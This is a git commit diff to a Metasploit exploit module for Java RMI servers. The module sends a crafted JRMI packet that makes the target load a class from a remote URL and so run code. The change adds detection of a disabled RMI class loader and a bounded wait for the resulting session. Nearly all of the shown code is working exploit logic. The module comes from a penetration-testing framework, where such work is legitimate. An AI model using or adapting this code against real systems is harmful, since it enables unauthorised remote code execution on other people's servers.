Smarter RMI class loader logic

2012-04-27 01:02:18 -05:00 · 2012-04-27 01:02:18 -05:00 · ec831a1658
parent 4c2e1c2859
commit ec831a1658
1 changed files with 19 additions and 3 deletions
--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@ -106,10 +106,26 @@ class Metasploit3 < Msf::Exploit::Remote
 		# write out minimal header and packet
 		print_status("Connected and sending request for #{new_url}")
 		#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
-		sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet);
+		sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet)

-		# wait for the request to be handled
-		while not session_created?
+		buf = ""
+		1.upto(6) do
+			res = sock.get_once(-1, 5) rescue nil
+			break if not res
+			break if session_created?
+			buf << res
+		end
+
+		if buf =~ /RMI class loader disabled/
+			print_error("Not exploitable: the RMI class loader is disabled")
+			return
+		end
+		
+		print_good("Target #{rhost}:#{rport} may be exploitable...")
+
+		# Wait for the request to be handled
+		1.upto(80) do
+			break if session_created?
 			select(nil, nil, nil, 0.25)
 			handler()
 		end